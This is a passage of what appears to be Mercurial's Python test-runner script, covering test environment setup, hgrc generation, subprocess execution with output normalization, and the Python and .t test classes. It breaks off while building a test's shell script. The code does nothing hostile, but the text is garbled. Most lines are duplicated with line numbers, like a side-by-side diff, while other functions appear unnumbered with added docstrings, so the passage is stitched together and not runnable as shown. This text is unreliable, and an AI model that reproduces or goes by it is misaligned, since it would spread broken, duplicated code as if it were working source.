            and not self._skipped
            and not self._debug
            and self._out
        ):
            with open(self.errpath, 'wb') as f:
                for line in self._out:
                    f.write(line)

        vlog("# Ret was:", self._ret, '(%s)' % self.name)
1223
1223
    def _run(self, env):
        """Execute the test payload and return (exitcode, output).

        Subclasses override this; the base implementation only signals
        that the test type is unknown.
        """
        # This should be implemented in child classes to run tests.
        raise unittest.SkipTest('unknown test type')
1227
1227
    def abort(self):
        """Terminate execution of this test."""
        # Only a flag is set here; run() reports it via
        # result.stopTest(self, interrupted=self._aborted).
        self._aborted = True
1231
1231
1232 def _portmap(self, i):
1232 def _portmap(self, i):
1233 offset = b'' if i == 0 else b'%d' % i
1233 offset = b'' if i == 0 else b'%d' % i
1234 return (br':%d\b' % (self._startport + i), b':$HGPORT%s' % offset)
1234 return (br':%d\b' % (self._startport + i), b':$HGPORT%s' % offset)
1235
1235
    def _getreplacements(self):
        """Obtain a mapping of text replacements to apply to test output.

        Test output needs to be normalized so it can be compared to expected
        output. This function defines how some of that normalization will
        occur.

        Returns a list of (regex, replacement) pairs (bytes).
        """
        r = [
            # This list should be parallel to defineport in _getenv
            self._portmap(0),
            self._portmap(1),
            self._portmap(2),
            (br'([^0-9])%s' % re.escape(self._localip()), br'\1$LOCALIP'),
            (br'\bHG_TXNID=TXN:[a-f0-9]{40}\b', br'HG_TXNID=TXN:$ID$'),
        ]
        r.append((self._escapepath(self._testtmp), b'$TESTTMP'))

        # Optional per-testdir file defining extra substitutions.
        replacementfile = os.path.join(self._testdir, b'common-pattern.py')

        if os.path.exists(replacementfile):
            data = {}
            with open(replacementfile, mode='rb') as source:
                # the intermediate 'compile' step help with debugging
                code = compile(source.read(), replacementfile, 'exec')
                exec(code, data)
            # 'substitutions' must be an iterable of 2-tuples, matching
            # the (pattern, replacement) pairs built above.
            for value in data.get('substitutions', ()):
                if len(value) != 2:
                    msg = 'malformatted substitution in %s: %r'
                    msg %= (replacementfile, value)
                    raise ValueError(msg)
                r.append(value)
        return r
1268
1268
1269 def _escapepath(self, p):
1269 def _escapepath(self, p):
1270 if os.name == 'nt':
1270 if os.name == 'nt':
1271 return b''.join(
1271 return b''.join(
1272 c.isalpha()
1272 c.isalpha()
1273 and b'[%s%s]' % (c.lower(), c.upper())
1273 and b'[%s%s]' % (c.lower(), c.upper())
1274 or c in b'/\\'
1274 or c in b'/\\'
1275 and br'[/\\]'
1275 and br'[/\\]'
1276 or c.isdigit()
1276 or c.isdigit()
1277 and c
1277 and c
1278 or b'\\' + c
1278 or b'\\' + c
1279 for c in [p[i : i + 1] for i in range(len(p))]
1279 for c in [p[i : i + 1] for i in range(len(p))]
1280 )
1280 )
1281 else:
1281 else:
1282 return re.escape(p)
1282 return re.escape(p)
1283
1283
1284 def _localip(self):
1284 def _localip(self):
1285 if self._useipv6:
1285 if self._useipv6:
1286 return b'::1'
1286 return b'::1'
1287 else:
1287 else:
1288 return b'127.0.0.1'
1288 return b'127.0.0.1'
1289
1289
1290 def _genrestoreenv(self, testenv):
1290 def _genrestoreenv(self, testenv):
1291 """Generate a script that can be used by tests to restore the original
1291 """Generate a script that can be used by tests to restore the original
1292 environment."""
1292 environment."""
1293 # Put the restoreenv script inside self._threadtmp
1293 # Put the restoreenv script inside self._threadtmp
1294 scriptpath = os.path.join(self._threadtmp, b'restoreenv.sh')
1294 scriptpath = os.path.join(self._threadtmp, b'restoreenv.sh')
1295 testenv['HGTEST_RESTOREENV'] = _bytes2sys(scriptpath)
1295 testenv['HGTEST_RESTOREENV'] = _bytes2sys(scriptpath)
1296
1296
1297 # Only restore environment variable names that the shell allows
1297 # Only restore environment variable names that the shell allows
1298 # us to export.
1298 # us to export.
1299 name_regex = re.compile('^[a-zA-Z][a-zA-Z0-9_]*$')
1299 name_regex = re.compile('^[a-zA-Z][a-zA-Z0-9_]*$')
1300
1300
1301 # Do not restore these variables; otherwise tests would fail.
1301 # Do not restore these variables; otherwise tests would fail.
1302 reqnames = {'PYTHON', 'TESTDIR', 'TESTTMP'}
1302 reqnames = {'PYTHON', 'TESTDIR', 'TESTTMP'}
1303
1303
1304 with open(scriptpath, 'w') as envf:
1304 with open(scriptpath, 'w') as envf:
1305 for name, value in origenviron.items():
1305 for name, value in origenviron.items():
1306 if not name_regex.match(name):
1306 if not name_regex.match(name):
1307 # Skip environment variables with unusual names not
1307 # Skip environment variables with unusual names not
1308 # allowed by most shells.
1308 # allowed by most shells.
1309 continue
1309 continue
1310 if name in reqnames:
1310 if name in reqnames:
1311 continue
1311 continue
1312 envf.write('%s=%s\n' % (name, shellquote(value)))
1312 envf.write('%s=%s\n' % (name, shellquote(value)))
1313
1313
1314 for name in testenv:
1314 for name in testenv:
1315 if name in origenviron or name in reqnames:
1315 if name in origenviron or name in reqnames:
1316 continue
1316 continue
1317 envf.write('unset %s\n' % (name,))
1317 envf.write('unset %s\n' % (name,))
1318
1318
1319 def _getenv(self):
1319 def _getenv(self):
1320 """Obtain environment variables to use during test execution."""
1320 """Obtain environment variables to use during test execution."""
1321
1321
1322 def defineport(i):
1322 def defineport(i):
1323 offset = '' if i == 0 else '%s' % i
1323 offset = '' if i == 0 else '%s' % i
1324 env["HGPORT%s" % offset] = '%s' % (self._startport + i)
1324 env["HGPORT%s" % offset] = '%s' % (self._startport + i)
1325
1325
1326 env = os.environ.copy()
1326 env = os.environ.copy()
1327 env['PYTHONUSERBASE'] = sysconfig.get_config_var('userbase') or ''
1327 env['PYTHONUSERBASE'] = sysconfig.get_config_var('userbase') or ''
1328 env['HGEMITWARNINGS'] = '1'
1328 env['HGEMITWARNINGS'] = '1'
1329 env['TESTTMP'] = _bytes2sys(self._testtmp)
1329 env['TESTTMP'] = _bytes2sys(self._testtmp)
1330 env['TESTNAME'] = self.name
1330 env['TESTNAME'] = self.name
1331 env['HOME'] = _bytes2sys(self._testtmp)
1331 env['HOME'] = _bytes2sys(self._testtmp)
1332 formated_timeout = _bytes2sys(b"%d" % default_defaults['timeout'][1])
1332 formated_timeout = _bytes2sys(b"%d" % default_defaults['timeout'][1])
1333 env['HGTEST_TIMEOUT_DEFAULT'] = formated_timeout
1333 env['HGTEST_TIMEOUT_DEFAULT'] = formated_timeout
1334 env['HGTEST_TIMEOUT'] = _bytes2sys(b"%d" % self._timeout)
1334 env['HGTEST_TIMEOUT'] = _bytes2sys(b"%d" % self._timeout)
1335 # This number should match portneeded in _getport
1335 # This number should match portneeded in _getport
1336 for port in xrange(3):
1336 for port in xrange(3):
1337 # This list should be parallel to _portmap in _getreplacements
1337 # This list should be parallel to _portmap in _getreplacements
1338 defineport(port)
1338 defineport(port)
1339 env["HGRCPATH"] = _bytes2sys(os.path.join(self._threadtmp, b'.hgrc'))
1339 env["HGRCPATH"] = _bytes2sys(os.path.join(self._threadtmp, b'.hgrc'))
1340 env["DAEMON_PIDS"] = _bytes2sys(
1340 env["DAEMON_PIDS"] = _bytes2sys(
1341 os.path.join(self._threadtmp, b'daemon.pids')
1341 os.path.join(self._threadtmp, b'daemon.pids')
1342 )
1342 )
1343 env["HGEDITOR"] = (
1343 env["HGEDITOR"] = (
1344 '"' + sysexecutable + '"' + ' -c "import sys; sys.exit(0)"'
1344 '"' + sysexecutable + '"' + ' -c "import sys; sys.exit(0)"'
1345 )
1345 )
1346 env["HGUSER"] = "test"
1346 env["HGUSER"] = "test"
1347 env["HGENCODING"] = "ascii"
1347 env["HGENCODING"] = "ascii"
1348 env["HGENCODINGMODE"] = "strict"
1348 env["HGENCODINGMODE"] = "strict"
1349 env["HGHOSTNAME"] = "test-hostname"
1349 env["HGHOSTNAME"] = "test-hostname"
1350 env['HGIPV6'] = str(int(self._useipv6))
1350 env['HGIPV6'] = str(int(self._useipv6))
1351 # See contrib/catapipe.py for how to use this functionality.
1351 # See contrib/catapipe.py for how to use this functionality.
1352 if 'HGTESTCATAPULTSERVERPIPE' not in env:
1352 if 'HGTESTCATAPULTSERVERPIPE' not in env:
1353 # If we don't have HGTESTCATAPULTSERVERPIPE explicitly set, pull the
1353 # If we don't have HGTESTCATAPULTSERVERPIPE explicitly set, pull the
1354 # non-test one in as a default, otherwise set to devnull
1354 # non-test one in as a default, otherwise set to devnull
1355 env['HGTESTCATAPULTSERVERPIPE'] = env.get(
1355 env['HGTESTCATAPULTSERVERPIPE'] = env.get(
1356 'HGCATAPULTSERVERPIPE', os.devnull
1356 'HGCATAPULTSERVERPIPE', os.devnull
1357 )
1357 )
1358
1358
1359 extraextensions = []
1359 extraextensions = []
1360 for opt in self._extraconfigopts:
1360 for opt in self._extraconfigopts:
1361 section, key = _sys2bytes(opt).split(b'.', 1)
1361 section, key = _sys2bytes(opt).split(b'.', 1)
1362 if section != 'extensions':
1362 if section != 'extensions':
1363 continue
1363 continue
1364 name = key.split(b'=', 1)[0]
1364 name = key.split(b'=', 1)[0]
1365 extraextensions.append(name)
1365 extraextensions.append(name)
1366
1366
1367 if extraextensions:
1367 if extraextensions:
1368 env['HGTESTEXTRAEXTENSIONS'] = b' '.join(extraextensions)
1368 env['HGTESTEXTRAEXTENSIONS'] = b' '.join(extraextensions)
1369
1369
1370 # LOCALIP could be ::1 or 127.0.0.1. Useful for tests that require raw
1370 # LOCALIP could be ::1 or 127.0.0.1. Useful for tests that require raw
1371 # IP addresses.
1371 # IP addresses.
1372 env['LOCALIP'] = _bytes2sys(self._localip())
1372 env['LOCALIP'] = _bytes2sys(self._localip())
1373
1373
1374 # This has the same effect as Py_LegacyWindowsStdioFlag in exewrapper.c,
1374 # This has the same effect as Py_LegacyWindowsStdioFlag in exewrapper.c,
1375 # but this is needed for testing python instances like dummyssh,
1375 # but this is needed for testing python instances like dummyssh,
1376 # dummysmtpd.py, and dumbhttp.py.
1376 # dummysmtpd.py, and dumbhttp.py.
1377 if PYTHON3 and os.name == 'nt':
1377 if PYTHON3 and os.name == 'nt':
1378 env['PYTHONLEGACYWINDOWSSTDIO'] = '1'
1378 env['PYTHONLEGACYWINDOWSSTDIO'] = '1'
1379
1379
1380 # Modified HOME in test environment can confuse Rust tools. So set
1380 # Modified HOME in test environment can confuse Rust tools. So set
1381 # CARGO_HOME and RUSTUP_HOME automatically if a Rust toolchain is
1381 # CARGO_HOME and RUSTUP_HOME automatically if a Rust toolchain is
1382 # present and these variables aren't already defined.
1382 # present and these variables aren't already defined.
1383 cargo_home_path = os.path.expanduser('~/.cargo')
1383 cargo_home_path = os.path.expanduser('~/.cargo')
1384 rustup_home_path = os.path.expanduser('~/.rustup')
1384 rustup_home_path = os.path.expanduser('~/.rustup')
1385
1385
1386 if os.path.exists(cargo_home_path) and b'CARGO_HOME' not in osenvironb:
1386 if os.path.exists(cargo_home_path) and b'CARGO_HOME' not in osenvironb:
1387 env['CARGO_HOME'] = cargo_home_path
1387 env['CARGO_HOME'] = cargo_home_path
1388 if (
1388 if (
1389 os.path.exists(rustup_home_path)
1389 os.path.exists(rustup_home_path)
1390 and b'RUSTUP_HOME' not in osenvironb
1390 and b'RUSTUP_HOME' not in osenvironb
1391 ):
1391 ):
1392 env['RUSTUP_HOME'] = rustup_home_path
1392 env['RUSTUP_HOME'] = rustup_home_path
1393
1393
1394 # Reset some environment variables to well-known values so that
1394 # Reset some environment variables to well-known values so that
1395 # the tests produce repeatable output.
1395 # the tests produce repeatable output.
1396 env['LANG'] = env['LC_ALL'] = env['LANGUAGE'] = 'C'
1396 env['LANG'] = env['LC_ALL'] = env['LANGUAGE'] = 'C'
1397 env['TZ'] = 'GMT'
1397 env['TZ'] = 'GMT'
1398 env["EMAIL"] = "Foo Bar <foo.bar@example.com>"
1398 env["EMAIL"] = "Foo Bar <foo.bar@example.com>"
1399 env['COLUMNS'] = '80'
1399 env['COLUMNS'] = '80'
1400 env['TERM'] = 'xterm'
1400 env['TERM'] = 'xterm'
1401
1401
1402 dropped = [
1402 dropped = [
1403 'CDPATH',
1403 'CDPATH',
1404 'CHGDEBUG',
1404 'CHGDEBUG',
1405 'EDITOR',
1405 'EDITOR',
1406 'GREP_OPTIONS',
1406 'GREP_OPTIONS',
1407 'HG',
1407 'HG',
1408 'HGMERGE',
1408 'HGMERGE',
1409 'HGPLAIN',
1409 'HGPLAIN',
1410 'HGPLAINEXCEPT',
1410 'HGPLAINEXCEPT',
1411 'HGPROF',
1411 'HGPROF',
1412 'http_proxy',
1412 'http_proxy',
1413 'no_proxy',
1413 'no_proxy',
1414 'NO_PROXY',
1414 'NO_PROXY',
1415 'PAGER',
1415 'PAGER',
1416 'VISUAL',
1416 'VISUAL',
1417 ]
1417 ]
1418
1418
1419 for k in dropped:
1419 for k in dropped:
1420 if k in env:
1420 if k in env:
1421 del env[k]
1421 del env[k]
1422
1422
1423 # unset env related to hooks
1423 # unset env related to hooks
1424 for k in list(env):
1424 for k in list(env):
1425 if k.startswith('HG_'):
1425 if k.startswith('HG_'):
1426 del env[k]
1426 del env[k]
1427
1427
1428 if self._usechg:
1428 if self._usechg:
1429 env['CHGSOCKNAME'] = os.path.join(self._chgsockdir, b'server')
1429 env['CHGSOCKNAME'] = os.path.join(self._chgsockdir, b'server')
1430 if self._chgdebug:
1430 if self._chgdebug:
1431 env['CHGDEBUG'] = 'true'
1431 env['CHGDEBUG'] = 'true'
1432
1432
1433 return env
1433 return env
1434
1434
1435 def _createhgrc(self, path):
1435 def _createhgrc(self, path):
1436 """Create an hgrc file for this test."""
1436 """Create an hgrc file for this test."""
1437 with open(path, 'wb') as hgrc:
1437 with open(path, 'wb') as hgrc:
1438 hgrc.write(b'[ui]\n')
1438 hgrc.write(b'[ui]\n')
1439 hgrc.write(b'slash = True\n')
1439 hgrc.write(b'slash = True\n')
1440 hgrc.write(b'interactive = False\n')
1440 hgrc.write(b'interactive = False\n')
1441 hgrc.write(b'merge = internal:merge\n')
1441 hgrc.write(b'merge = internal:merge\n')
1442 hgrc.write(b'mergemarkers = detailed\n')
1442 hgrc.write(b'mergemarkers = detailed\n')
1443 hgrc.write(b'promptecho = True\n')
1443 hgrc.write(b'promptecho = True\n')
1444 hgrc.write(b'[defaults]\n')
1444 hgrc.write(b'[defaults]\n')
1445 hgrc.write(b'[devel]\n')
1445 hgrc.write(b'[devel]\n')
1446 hgrc.write(b'all-warnings = true\n')
1446 hgrc.write(b'all-warnings = true\n')
1447 hgrc.write(b'default-date = 0 0\n')
1447 hgrc.write(b'default-date = 0 0\n')
1448 hgrc.write(b'[largefiles]\n')
1448 hgrc.write(b'[largefiles]\n')
1449 hgrc.write(
1449 hgrc.write(
1450 b'usercache = %s\n'
1450 b'usercache = %s\n'
1451 % (os.path.join(self._testtmp, b'.cache/largefiles'))
1451 % (os.path.join(self._testtmp, b'.cache/largefiles'))
1452 )
1452 )
1453 hgrc.write(b'[lfs]\n')
1453 hgrc.write(b'[lfs]\n')
1454 hgrc.write(
1454 hgrc.write(
1455 b'usercache = %s\n'
1455 b'usercache = %s\n'
1456 % (os.path.join(self._testtmp, b'.cache/lfs'))
1456 % (os.path.join(self._testtmp, b'.cache/lfs'))
1457 )
1457 )
1458 hgrc.write(b'[web]\n')
1458 hgrc.write(b'[web]\n')
1459 hgrc.write(b'address = localhost\n')
1459 hgrc.write(b'address = localhost\n')
1460 hgrc.write(b'ipv6 = %r\n' % self._useipv6)
1460 hgrc.write(b'ipv6 = %r\n' % self._useipv6)
1461 hgrc.write(b'server-header = testing stub value\n')
1461 hgrc.write(b'server-header = testing stub value\n')
1462
1462
1463 for opt in self._extraconfigopts:
1463 for opt in self._extraconfigopts:
1464 section, key = _sys2bytes(opt).split(b'.', 1)
1464 section, key = _sys2bytes(opt).split(b'.', 1)
1465 assert b'=' in key, (
1465 assert b'=' in key, (
1466 'extra config opt %s must ' 'have an = for assignment' % opt
1466 'extra config opt %s must ' 'have an = for assignment' % opt
1467 )
1467 )
1468 hgrc.write(b'[%s]\n%s\n' % (section, key))
1468 hgrc.write(b'[%s]\n%s\n' % (section, key))
1469
1469
    def fail(self, msg):
        """Record this test as failed with reason *msg*."""
        # unittest differentiates between errored and failed.
        # Failed is denoted by AssertionError (by default at least).
        raise AssertionError(msg)
1474
1474
    def _runcommand(self, cmd, env, normalizenewlines=False):
        """Run command in a sub-process, capturing the output (stdout and
        stderr).

        Return a tuple (exitcode, output). output is None in debug mode.

        When normalizenewlines is True, CRLF in the captured output is
        rewritten to LF before splitting into lines.
        """
        if self._debug:
            # Debug mode: let the child write straight to the terminal,
            # no capture, no timeout.
            proc = subprocess.Popen(
                _bytes2sys(cmd),
                shell=True,
                cwd=_bytes2sys(self._testtmp),
                env=env,
            )
            ret = proc.wait()
            return (ret, None)

        proc = Popen4(cmd, self._testtmp, self._timeout, env)

        def cleanup():
            # Kill the child and its daemons; fabricate a SIGTERM-style
            # status if the child managed to exit cleanly first.
            terminate(proc)
            ret = proc.wait()
            if ret == 0:
                ret = signal.SIGTERM << 8
            killdaemons(env['DAEMON_PIDS'])
            return ret

        # The child gets no stdin.
        proc.tochild.close()

        try:
            output = proc.fromchild.read()
        except KeyboardInterrupt:
            vlog('# Handling keyboard interrupt')
            cleanup()
            raise

        ret = proc.wait()
        if wifexited(ret):
            ret = os.WEXITSTATUS(ret)

        if proc.timeout:
            # Sentinel string; runTest() checks for it explicitly.
            ret = 'timeout'

        if ret:
            killdaemons(env['DAEMON_PIDS'])

        # Normalize ports, paths, IPs etc. so output is comparable.
        for s, r in self._getreplacements():
            output = re.sub(s, r, output)

        if normalizenewlines:
            output = output.replace(b'\r\n', b'\n')

        return ret, output.splitlines(True)
1527
1527
1528
1528
1529 class PythonTest(Test):
1529 class PythonTest(Test):
1530 """A Python-based test."""
1530 """A Python-based test."""
1531
1531
1532 @property
1532 @property
1533 def refpath(self):
1533 def refpath(self):
1534 return os.path.join(self._testdir, b'%s.out' % self.bname)
1534 return os.path.join(self._testdir, b'%s.out' % self.bname)
1535
1535
1536 def _run(self, env):
1536 def _run(self, env):
1537 # Quote the python(3) executable for Windows
1537 # Quote the python(3) executable for Windows
1538 cmd = b'"%s" "%s"' % (PYTHON, self.path)
1538 cmd = b'"%s" "%s"' % (PYTHON, self.path)
1539 vlog("# Running", cmd.decode("utf-8"))
1539 vlog("# Running", cmd.decode("utf-8"))
1540 normalizenewlines = os.name == 'nt'
1540 normalizenewlines = os.name == 'nt'
1541 result = self._runcommand(cmd, env, normalizenewlines=normalizenewlines)
1541 result = self._runcommand(cmd, env, normalizenewlines=normalizenewlines)
1542 if self._aborted:
1542 if self._aborted:
1543 raise KeyboardInterrupt()
1543 raise KeyboardInterrupt()
1544
1544
1545 return result
1545 return result
1546
1546
1547
1547
1548 # Some glob patterns apply only in some circumstances, so the script
1548 # Some glob patterns apply only in some circumstances, so the script
1549 # might want to remove (glob) annotations that otherwise should be
1549 # might want to remove (glob) annotations that otherwise should be
1550 # retained.
1550 # retained.
1551 checkcodeglobpats = [
1551 checkcodeglobpats = [
1552 # On Windows it looks like \ doesn't require a (glob), but we know
1552 # On Windows it looks like \ doesn't require a (glob), but we know
1553 # better.
1553 # better.
1554 re.compile(br'^pushing to \$TESTTMP/.*[^)]$'),
1554 re.compile(br'^pushing to \$TESTTMP/.*[^)]$'),
1555 re.compile(br'^moving \S+/.*[^)]$'),
1555 re.compile(br'^moving \S+/.*[^)]$'),
1556 re.compile(br'^pulling from \$TESTTMP/.*[^)]$'),
1556 re.compile(br'^pulling from \$TESTTMP/.*[^)]$'),
1557 # Not all platforms have 127.0.0.1 as loopback (though most do),
1557 # Not all platforms have 127.0.0.1 as loopback (though most do),
1558 # so we always glob that too.
1558 # so we always glob that too.
1559 re.compile(br'.*\$LOCALIP.*$'),
1559 re.compile(br'.*\$LOCALIP.*$'),
1560 ]
1560 ]
1561
1561
1562 bchr = chr
1562 bchr = chr
1563 if PYTHON3:
1563 if PYTHON3:
1564 bchr = lambda x: bytes([x])
1564 bchr = lambda x: bytes([x])
1565
1565
1566 WARN_UNDEFINED = 1
1566 WARN_UNDEFINED = 1
1567 WARN_YES = 2
1567 WARN_YES = 2
1568 WARN_NO = 3
1568 WARN_NO = 3
1569
1569
1570 MARK_OPTIONAL = b" (?)\n"
1570 MARK_OPTIONAL = b" (?)\n"
1571
1571
1572
1572
1573 def isoptional(line):
1573 def isoptional(line):
1574 return line.endswith(MARK_OPTIONAL)
1574 return line.endswith(MARK_OPTIONAL)
1575
1575
1576
1576
1577 class TTest(Test):
1577 class TTest(Test):
1578 """A "t test" is a test backed by a .t file."""
1578 """A "t test" is a test backed by a .t file."""
1579
1579
1580 SKIPPED_PREFIX = b'skipped: '
1580 SKIPPED_PREFIX = b'skipped: '
1581 FAILED_PREFIX = b'hghave check failed: '
1581 FAILED_PREFIX = b'hghave check failed: '
1582 NEEDESCAPE = re.compile(br'[\x00-\x08\x0b-\x1f\x7f-\xff]').search
1582 NEEDESCAPE = re.compile(br'[\x00-\x08\x0b-\x1f\x7f-\xff]').search
1583
1583
1584 ESCAPESUB = re.compile(br'[\x00-\x08\x0b-\x1f\\\x7f-\xff]').sub
1584 ESCAPESUB = re.compile(br'[\x00-\x08\x0b-\x1f\\\x7f-\xff]').sub
1585 ESCAPEMAP = {bchr(i): br'\x%02x' % i for i in range(256)}
1585 ESCAPEMAP = {bchr(i): br'\x%02x' % i for i in range(256)}
1586 ESCAPEMAP.update({b'\\': b'\\\\', b'\r': br'\r'})
1586 ESCAPEMAP.update({b'\\': b'\\\\', b'\r': br'\r'})
1587
1587
1588 def __init__(self, path, *args, **kwds):
1588 def __init__(self, path, *args, **kwds):
1589 # accept an extra "case" parameter
1589 # accept an extra "case" parameter
1590 case = kwds.pop('case', [])
1590 case = kwds.pop('case', [])
1591 self._case = case
1591 self._case = case
1592 self._allcases = {x for y in parsettestcases(path) for x in y}
1592 self._allcases = {x for y in parsettestcases(path) for x in y}
1593 super(TTest, self).__init__(path, *args, **kwds)
1593 super(TTest, self).__init__(path, *args, **kwds)
1594 if case:
1594 if case:
1595 casepath = b'#'.join(case)
1595 casepath = b'#'.join(case)
1596 self.name = '%s#%s' % (self.name, _bytes2sys(casepath))
1596 self.name = '%s#%s' % (self.name, _bytes2sys(casepath))
1597 self.errpath = b'%s#%s.err' % (self.errpath[:-4], casepath)
1597 self.errpath = b'%s#%s.err' % (self.errpath[:-4], casepath)
1598 self._tmpname += b'-%s' % casepath
1598 self._tmpname += b'-%s' % casepath
1599 self._have = {}
1599 self._have = {}
1600
1600
1601 @property
1601 @property
1602 def refpath(self):
1602 def refpath(self):
1603 return os.path.join(self._testdir, self.bname)
1603 return os.path.join(self._testdir, self.bname)
1604
1604
1605 def _run(self, env):
1605 def _run(self, env):
1606 with open(self.path, 'rb') as f:
1606 with open(self.path, 'rb') as f:
1607 lines = f.readlines()
1607 lines = f.readlines()
1608
1608
1609 # .t file is both reference output and the test input, keep reference
1609 # .t file is both reference output and the test input, keep reference
1610 # output updated with the the test input. This avoids some race
1610 # output updated with the the test input. This avoids some race
1611 # conditions where the reference output does not match the actual test.
1611 # conditions where the reference output does not match the actual test.
1612 if self._refout is not None:
1612 if self._refout is not None:
1613 self._refout = lines
1613 self._refout = lines
1614
1614
1615 salt, script, after, expected = self._parsetest(lines)
1615 salt, script, after, expected = self._parsetest(lines)
1616
1616
1617 # Write out the generated script.
1617 # Write out the generated script.
1618 fname = b'%s.sh' % self._testtmp
1618 fname = b'%s.sh' % self._testtmp
1619 with open(fname, 'wb') as f:
1619 with open(fname, 'wb') as f:
1620 for l in script:
1620 for l in script:
1621 f.write(l)
1621 f.write(l)
1622
1622
1623 cmd = b'%s "%s"' % (self._shell, fname)
1623 cmd = b'%s "%s"' % (self._shell, fname)
1624 vlog("# Running", cmd.decode("utf-8"))
1624 vlog("# Running", cmd.decode("utf-8"))
1625
1625
1626 exitcode, output = self._runcommand(cmd, env)
1626 exitcode, output = self._runcommand(cmd, env)
1627
1627
1628 if self._aborted:
1628 if self._aborted:
1629 raise KeyboardInterrupt()
1629 raise KeyboardInterrupt()
1630
1630
1631 # Do not merge output if skipped. Return hghave message instead.
1631 # Do not merge output if skipped. Return hghave message instead.
1632 # Similarly, with --debug, output is None.
1632 # Similarly, with --debug, output is None.
1633 if exitcode == self.SKIPPED_STATUS or output is None:
1633 if exitcode == self.SKIPPED_STATUS or output is None:
1634 return exitcode, output
1634 return exitcode, output
1635
1635
1636 return self._processoutput(exitcode, output, salt, after, expected)
1636 return self._processoutput(exitcode, output, salt, after, expected)
1637
1637
1638 def _hghave(self, reqs):
1638 def _hghave(self, reqs):
1639 allreqs = b' '.join(reqs)
1639 allreqs = b' '.join(reqs)
1640
1640
1641 self._detectslow(reqs)
1641 self._detectslow(reqs)
1642
1642
1643 if allreqs in self._have:
1643 if allreqs in self._have:
1644 return self._have.get(allreqs)
1644 return self._have.get(allreqs)
1645
1645
1646 # TODO do something smarter when all other uses of hghave are gone.
1646 # TODO do something smarter when all other uses of hghave are gone.
1647 runtestdir = osenvironb[b'RUNTESTDIR']
1647 runtestdir = osenvironb[b'RUNTESTDIR']
1648 tdir = runtestdir.replace(b'\\', b'/')
1648 tdir = runtestdir.replace(b'\\', b'/')
1649 proc = Popen4(
1649 proc = Popen4(
1650 b'%s -c "%s/hghave %s"' % (self._shell, tdir, allreqs),
1650 b'%s -c "%s/hghave %s"' % (self._shell, tdir, allreqs),
1651 self._testtmp,
1651 self._testtmp,
1652 0,
1652 0,
1653 self._getenv(),
1653 self._getenv(),
1654 )
1654 )
1655 stdout, stderr = proc.communicate()
1655 stdout, stderr = proc.communicate()
1656 ret = proc.wait()
1656 ret = proc.wait()
1657 if wifexited(ret):
1657 if wifexited(ret):
1658 ret = os.WEXITSTATUS(ret)
1658 ret = os.WEXITSTATUS(ret)
1659 if ret == 2:
1659 if ret == 2:
1660 print(stdout.decode('utf-8'))
1660 print(stdout.decode('utf-8'))
1661 sys.exit(1)
1661 sys.exit(1)
1662
1662
1663 if ret != 0:
1663 if ret != 0:
1664 self._have[allreqs] = (False, stdout)
1664 self._have[allreqs] = (False, stdout)
1665 return False, stdout
1665 return False, stdout
1666
1666
1667 self._have[allreqs] = (True, None)
1667 self._have[allreqs] = (True, None)
1668 return True, None
1668 return True, None
1669
1669
1670 def _detectslow(self, reqs):
1670 def _detectslow(self, reqs):
1671 """update the timeout of slow test when appropriate"""
1671 """update the timeout of slow test when appropriate"""
1672 if b'slow' in reqs:
1672 if b'slow' in reqs:
1673 self._timeout = self._slowtimeout
1673 self._timeout = self._slowtimeout
1674
1674
1675 def _iftest(self, args):
1675 def _iftest(self, args):
1676 # implements "#if"
1676 # implements "#if"
1677 reqs = []
1677 reqs = []
1678 for arg in args:
1678 for arg in args:
1679 if arg.startswith(b'no-') and arg[3:] in self._allcases:
1679 if arg.startswith(b'no-') and arg[3:] in self._allcases:
1680 if arg[3:] in self._case:
1680 if arg[3:] in self._case:
1681 return False
1681 return False
1682 elif arg in self._allcases:
1682 elif arg in self._allcases:
1683 if arg not in self._case:
1683 if arg not in self._case:
1684 return False
1684 return False
1685 else:
1685 else:
1686 reqs.append(arg)
1686 reqs.append(arg)
1687 self._detectslow(reqs)
1687 self._detectslow(reqs)
1688 return self._hghave(reqs)[0]
1688 return self._hghave(reqs)[0]
1689
1689
1690 def _parsetest(self, lines):
1690 def _parsetest(self, lines):
1691 # We generate a shell script which outputs unique markers to line
1691 # We generate a shell script which outputs unique markers to line
1692 # up script results with our source. These markers include input
1692 # up script results with our source. These markers include input
1693 # line number and the last return code.
1693 # line number and the last return code.
1694 salt = b"SALT%d" % time.time()
1694 salt = b"SALT%d" % time.time()
1695
1695
1696 def addsalt(line, inpython):
1696 def addsalt(line, inpython):
1697 if inpython:
1697 if inpython:
1698 script.append(b'%s %d 0\n' % (salt, line))
1698 script.append(b'%s %d 0\n' % (salt, line))
1699 else:
1699 else:
1700 script.append(b'echo %s %d $?\n' % (salt, line))
1700 script.append(b'echo %s %d $?\n' % (salt, line))
1701
1701
1702 activetrace = []
1702 activetrace = []
1703 session = str(uuid.uuid4())
1703 session = str(uuid.uuid4())
1704 if PYTHON3:
1704 if PYTHON3:
1705 session = session.encode('ascii')
1705 session = session.encode('ascii')
1706 hgcatapult = os.getenv('HGTESTCATAPULTSERVERPIPE') or os.getenv(
1706 hgcatapult = os.getenv('HGTESTCATAPULTSERVERPIPE') or os.getenv(
1707 'HGCATAPULTSERVERPIPE'
1707 'HGCATAPULTSERVERPIPE'
1708 )
1708 )
1709
1709
1710 def toggletrace(cmd=None):
1710 def toggletrace(cmd=None):
1711 if not hgcatapult or hgcatapult == os.devnull:
1711 if not hgcatapult or hgcatapult == os.devnull:
1712 return
1712 return
1713
1713
1714 if activetrace:
1714 if activetrace:
1715 script.append(
1715 script.append(
1716 b'echo END %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1716 b'echo END %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1717 % (session, activetrace[0])
1717 % (session, activetrace[0])
1718 )
1718 )
1719 if cmd is None:
1719 if cmd is None:
1720 return
1720 return
1721
1721
1722 if isinstance(cmd, str):
1722 if isinstance(cmd, str):
1723 quoted = shellquote(cmd.strip())
1723 quoted = shellquote(cmd.strip())
1724 else:
1724 else:
1725 quoted = shellquote(cmd.strip().decode('utf8')).encode('utf8')
1725 quoted = shellquote(cmd.strip().decode('utf8')).encode('utf8')
1726 quoted = quoted.replace(b'\\', b'\\\\')
1726 quoted = quoted.replace(b'\\', b'\\\\')
1727 script.append(
1727 script.append(
1728 b'echo START %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1728 b'echo START %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1729 % (session, quoted)
1729 % (session, quoted)
1730 )
1730 )
1731 activetrace[0:] = [quoted]
1731 activetrace[0:] = [quoted]
1732
1732
1733 script = []
1733 script = []
1734
1734
